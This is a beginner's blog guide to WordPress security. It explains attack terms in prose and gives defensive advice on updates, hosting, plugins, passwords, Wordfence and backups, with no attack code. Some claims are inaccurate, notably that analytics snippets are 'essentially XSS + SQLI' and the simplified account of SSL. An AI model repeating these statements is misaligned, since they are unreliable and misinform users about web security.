Secure Your WordPress Site Like a Pro: Beginner’s Guide to Avoiding Hacks
Basic WordPress Security

As technology advances, so do the risks associated with it. In today’s digital age, ensuring the security of your website is of utmost importance. With the increasing popularity of WordPress as a website building platform, it is crucial for beginners to understand the basics of WordPress security.

In this beginner’s guide, we will provide you with simple steps to enhance the security of your WordPress site. Whether you’re new to WordPress or an experienced user looking for a refresher, these tips will help you protect your site from potential threats.

Let’s dive in and learn how to fortify your WordPress site with basic security measures.

Familiarizing Yourself with Security Acronyms: SQLi, XSS, DoS, and More

When we start delving into security, we’re introduced to acronyms that initially mean nothing to us but gradually become familiar. And here’s a hint, they’re not as scary as they seem because once you understand them, you’ll find that about 90% of security is a mental game of experience.

Albert Einstein once said:

The only source of knowledge is experience.

In our case, the experience comes from years of working with WordPress and helping beginners secure their sites.

Let’s start getting to know the prominent terms:

SQL Injection (SQLi)

SQL injection attacks occur when an attacker exploits vulnerabilities in a website’s database through the input fields available on the site. They can insert or “inject” a SQL query via the site’s input data, allowing them to access, modify, or delete the database contents. This can lead to the exposure of sensitive information, including user data.

Cross-Site Scripting (XSS)

Cross-site scripting is one of the most prevalent vulnerabilities across the web, including WordPress sites. It occurs when attackers manage to inject malicious scripts into the content of a site that are then executed in the browser of a user visiting the site. This can be used to steal cookies, session tokens, or other sensitive information from users.

Secure Sockets Layer (SSL)

SSL is a security protocol. It’s an improvement over the old HTTP that was previously used. The enhancement comes in the form of two-way encryption, so a hacker listening to the data communication between a site and a visitor will not see passwords and other information passing by in plain text. Even if a hacker decides to intercept the traffic between the site and the browser, they will see encrypted code that is cold and almost impossible to decrypt.

Cross-Site Request Forgery (CSRF)

In a CSRF attack, an attacker tricks the victim into submitting a malicious request. This can change the victim’s details or perform actions on behalf of the user without their consent. For WordPress sites, this might involve altering passwords, posting comments, or making purchases.

File Inclusion Exploits

File inclusion vulnerabilities allow attackers to include files on a server through the web browser. This can lead to remote code execution. There are two types of file inclusion vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI exploits allow attackers to include files that are already on the server, while RFI exploits involve including remote files or scripts.

Brute Force Attacks

Brute force attacks involve attackers trying numerous username and password combinations to gain unauthorized access to a site. WordPress sites are particularly vulnerable to brute force attacks due to the common use of predictable usernames like “admin”.

Denial of Service (DoS)

A Denial of Service attack aims to make a website or service unavailable to its users, typically by overwhelming the site with a flood of requests. While not specific to WordPress, WordPress sites can be targeted by such attacks, especially through vulnerabilities in plugins or themes that can be exploited to amplify the attack.

Phishing Attempts

Phishing involves tricking the site administrator into giving away sensitive information. This might involve fake login pages or fraudulent emails requesting the admin to update their payment information, thereby compromising site security.


Malware can be introduced to WordPress sites through compromised themes, plugins, or weak admin credentials. It can lead to a range of issues, from serving spam to redirecting visitors to malicious sites.


A backdoor is malicious code designed to allow attackers access to the site or server without needing to authenticate or go through the usual authentication process. Backdoors can be embedded within plugins, themes, or even WordPress core files themselves, where they are hidden to prevent detection by site owners or system administrators.

Backdoors can serve various malicious purposes, including data theft, the distribution of additional malicious software, site defacement, or access and control over server resources for further malicious activities. Removing backdoors requires diligent identification and cleanup of malicious code, sometimes even restoring the site from a clean backup and updating passwords and authentication methods.

What are the common security holes in WordPress sites?

The more you understand the source and nature of the problem, the better equipped you’ll be to prevent security issues on your site.

Lack of System and Plugin Updates

Security experts, programmers, and hackers scrutinize code in depth. But as we’re operating within the WordPress ecosystem, we’re entitled to regular updates against code vulnerabilities discovered over time. Despite being entirely free, some choose not to perform regular updates to their WordPress system for various reasons. Some due to a lack of understanding of its importance.

For example, if someone identifies an issue in a popular contact form plugin like CF7 tomorrow, and the breach is of the SQLi type, an update will be available very quickly in the updates section of the dashboard. All you need to do is choose to update the plugin, and you will be protected from the newly discovered breach.

On the other hand, not updating in time leaves your site exposed to hackers who may explore your site and attempt to exploit the new vulnerability. Obviously, this is a situation we want to avoid.

Using Cheap and Dubious Hosting Services

There are enough hosting providers in the world that will offer their hosting because it’s so cheap, they have many users, and their reviews are excellent. They might even promise impressive data on performance improvements for your site.

I was taught that “not all that glitters is gold,” and here lies a security information issue. Even if the company offers you advanced security features and has a resounding name with WAF, experts, firewalls, and more… it’s not logical to receive everything at a low price. And the price is a primary indicator of a security problem.

You might wonder why the issue would be with security and not, for example, speed. That’s a good question, with a clear answer: costs. For example, if we consider any server and try to package it as a hosting company, we can provide very fast hosting in very good locations with a physical server costing (for example) $100 a month. Even if we exaggerate and take the most monstrous (physical) server we can think of: $500 a month. The cost of one full-time security person stands at about $10,000 a month.

A large hosting company needs teams of security personnel and server monitoring to provide the necessary security. A central article on hosting companies will follow. Until then, you can consult with me privately (contact form), in the comments, or sign up for the site’s newsletter to receive updates.

Until then, we learn to understand that a low price indicates cheap security quality, and it’s better to avoid it.

Using Unmaintained (Abandoned) Plugins or Those Written with Low Code Quality

I often encounter a development process for a site, a plugin that seems completely innocent and does exactly (and only) what I need from it. But the plugin hasn’t received an update in 3 years.

Beyond the problem that I’ll need to check if the plugin still supports and works properly with an up-to-date version of WordPress, I need to know that there might be security issues in the site due to using an outdated plugin. The plugin’s code has been exposed for a long time, and it’s not unlikely that hackers have already found a possible breach for the plugin.

In such a case, it’s highly recommended to look for another, more active plugin to work with, or simply develop the specific thing you wanted from it yourself.

Using Themes and/or Plugins from Dubious Sources or Nulled Versions

In the past, the world of warez, boards, and even file-sharing software like eMule and Kazaa were very common and a source for finding versions of things that are supposed to cost money, for free. But these sources are not reliable, unknown, and can spread viruses and Backdoors.

Actually, it’s very simple. The distributor, in this case, a phishing hacker (which we’ll learn about in another article), embeds within the things he distributes, code that gives him full access to your site, and from there, he can access everything in the site, including your private account on the site.

To avoid potential harm, all we need to do is download or purchase plugins and themes from a trusted and preferably certified source. Since there is no professional website builder certification for WordPress sites or professional plugin developer for WordPress sites in the market… What we need to do is first and foremost take the core files of WordPress only from the official site, which is It’s recommended to choose themes from the repository on, where they have many users (many downloads). You can also purchase from reputable and known sources like, and of course, you can purchase a custom theme from an experienced developer. I offer this service at for decades.

In the case of plugins, the things are quite similar to what I wrote for themes. The only difference is that many plugins offer purchase only through the plugin’s site, which is due to several reasons like the WordPress use license, fees charged by companies like themeforest, and personal considerations for a more prestigious and unique impression.

I would always recommend you to check the homepage of the plugin/theme you want to install. Sometimes you’ll discover that the site is no longer active, or suddenly your antivirus jumps on your computer. These are clear signs that you need to stay away from them.

Embedding “Third-Party” Codes

How many times has it happened that you’ve built a site and now you want to promote it? You start by inserting codes from well-known companies like Google, for Analytics or Tag Manager. You continue with Facebook Pixel and then hear about HOTJAR and various analytics services and start inserting them into the site, when it’s basically embedding a small code while promising you that it does nothing.

With 25 years of experience, I can confidently say: it’s not that they are lying. They just don’t know, but yes. Every code you insert into the site will do something. Mostly, it simply affects the site’s performance. But in some cases, it also affects its security. The small code they ask to insert is essentially a type of XSS + SQLI together, and you should avoid them as much as possible.

I’m not saying not to work with things that are a must like Google Analytics, on the contrary, it’s something that every site needs. But let’s say that even HOTJAR (which is completely clean and a very respectable company) is not a service that everyone needs and can be avoided. Definitely if it’s some original company or a Chinese company that someone told you is well-known but in practice, no one you talk to knows it.

Using an Outdated Version of PHP

As of writing this article, historical PHP versions like 5.6 have long been outdated. And even newer versions like 7 to 8 are no longer valid!

And what does that mean? PHP itself (which is the foundation of what runs the WordPress system) receives regular updates just like WordPress itself. And there are security holes from time to time… And if the version is no longer valid, it does not receive updates. Therefore, it’s dangerous to use such a version that may contain security holes, and we won’t even know about it.

Distributing and Leaving High Access to Redundant People or Those Who Have Left the Company

Many times, I’ve entered sites of new clients of mine, where the site is already active and veteran. In an “unexplained” coincidence, I saw that those who do not care to whom they give admin access and also when to remove accesses to people who have already left the business – eventually those people have severe security problems. It could be because the site was hacked or there was a cyber incident in the company, and they decided to lock everything until further notice.

In addition, it’s important to remember that sometimes even content editors on the site can err and upload “external code” which is essentially a trick of a tool that does wonders for an article. Therefore, as part of granting editing and writing access on the site, it’s also necessary to emphasize clear legal rules that it’s forbidden to add code or scripts that were not approved by the site’s technical manager.

Predictable Passwords and Accesses

Continuing directly from the previous section, many people simply have a problem remembering a good and difficult password. So they enter their phone number, maybe their ID, maybe their birth date, maybe the year they started their current job… Yes, there are such people and many, and maybe even some of those who will read this article.

15 years ago, I did a test and bought a random domain and built a WordPress site with the following login details:
Username: admin
Password: 123456
And I left it to see what would happen to the site’s fate.
It didn’t take 24 hours, and the site was hacked. Everything in the hosting with that site also suffered from this hack.
To your question, how long would it take for your account to be hacked with your first name + your phone number? It won’t take a day (unless you specifically annoyed someone) but it will be faster than you think.

WordPress Security Plugin

I recommend using the wordfence plugin, even in its free service. The plugin offers many features such as monitoring changes in files, blocking IP addresses after a number of failed login attempts, preference settings, and exception handling of suspicious traffic, and more.

One of the most important things I loved seeing in its free service is the ability to detect a situation where a content editor tries to add code of an external service, and wordfence blocks it, waiting for the site administrator’s approval.

Additionally, the feature of logging in through a second layer of security is very useful and improves the one that comes with the plugin. In fact, only an account that was previously set to work with account authenticators like “Google Authenticator” can log into the site using an authentication code after entering the correct username and password. This option, as mentioned, is efficient and very convenient.

Backups for WordPress Sites. Why is it so Critical?

Backup is very important for anything in life, especially when you look at something that has a lot of money invested in it.

If we take your car, you insure it in several different cases to defend against an unexpected offer just in case… and preferably we won’t need to use it. Similarly, a backup of your WordPress site. We want to be protected if, by chance, the site is hacked or fails in an update, we can go back.

Usually, everyone creates a copy of the backup for a major update or significant development, such as adding a store to the site. Which is correct but not enough.

In addition to the initiated backup that we will perform close to the time we made a significant change, we also need an automatic backup, preferably daily, so that we have the option to go back whenever we need.

In an exceptional case I encountered, I received a report about a hacked site. I looked at the hosting company and saw that there is a valid backup service that operates every day. I performed a restore to one day before the report and saw that the site was still hacked (in its case: showed content of a different kind and not the site’s content) I went further back in the backups to check when the site was hacked and discovered that the site had been hacked about 4 days.

Luckily for the client, he had automatic backups up to a month back. We restored the site’s backup to the last clean backup we had, and the client was satisfied. The treatment was for the site and to block the security hole in the site, not to restore the site or clean it from malicious code.

The time required to treat the identification of the security hole and its repair is usually up to 3 hours.

While manual restoration or cleaning of a site from a hack usually takes about 3 days and can last much longer in different cases.

Of course, this difference is also reflected in the payment to whoever performs the fault treatment.

You can perform the initiated backup according to this guide:

An automatic daily backup is recommended to be the responsibility of the hosting company. It’s important to ensure that the hosting includes an automatic daily backup that is also controlled by the hosting company. If you don’t have this service through the hosting company, then you need to use a plugin like UpdraftPlus.


Updates, backups, official and safe sources for everything you install on the site, responsible access distribution, hosting company. These were the most basic things to avoid hacking.


Q: Why is WordPress security important for beginners?

A: WordPress security is essential for beginners as it helps protect their websites from potential threats and unauthorized access.

Q: What are some simple steps to enhance WordPress security?

A: Some simple steps to enhance WordPress security include keeping plugins and themes updated, using strong passwords, enabling two-factor authentication, and regularly backing up your site.

Q: What is the most important thing to know?

A: An automated, controlled backup that is held by the hosting company is essential. This way, if something happens and the site is hacked, it’s possible to go back and fix the issue.

Q: What is the first thing I need to do to secure my site?

A: Perform updates for everything. Updates protect us from a very large percentage of hacks.

Q: How can I protect my WordPress site from Elementor vulnerabilities?

A: To protect your WordPress site from Elementor vulnerabilities, it is important to update your Elementor plugin to the latest version and apply any security patches or fixes provided by the developers.

Q: Does a basic WordPress site without e-commerce need advanced security measures?

A: Yes. Every site, regardless of its purpose, is a target for hackers and should adhere to basic security protocols.

Q: How often should I update my WordPress themes and plugins?

A: Regularly. Updates are a simple process that usually takes just a few minutes. Checking every two weeks and updating is good, but more frequent updates are recommended.

Q: What are the signs that my WordPress site has been hacked?

A: Sudden changes in site performance or content. Sometimes, your computer’s antivirus software may alert you to a security issue when accessing your site.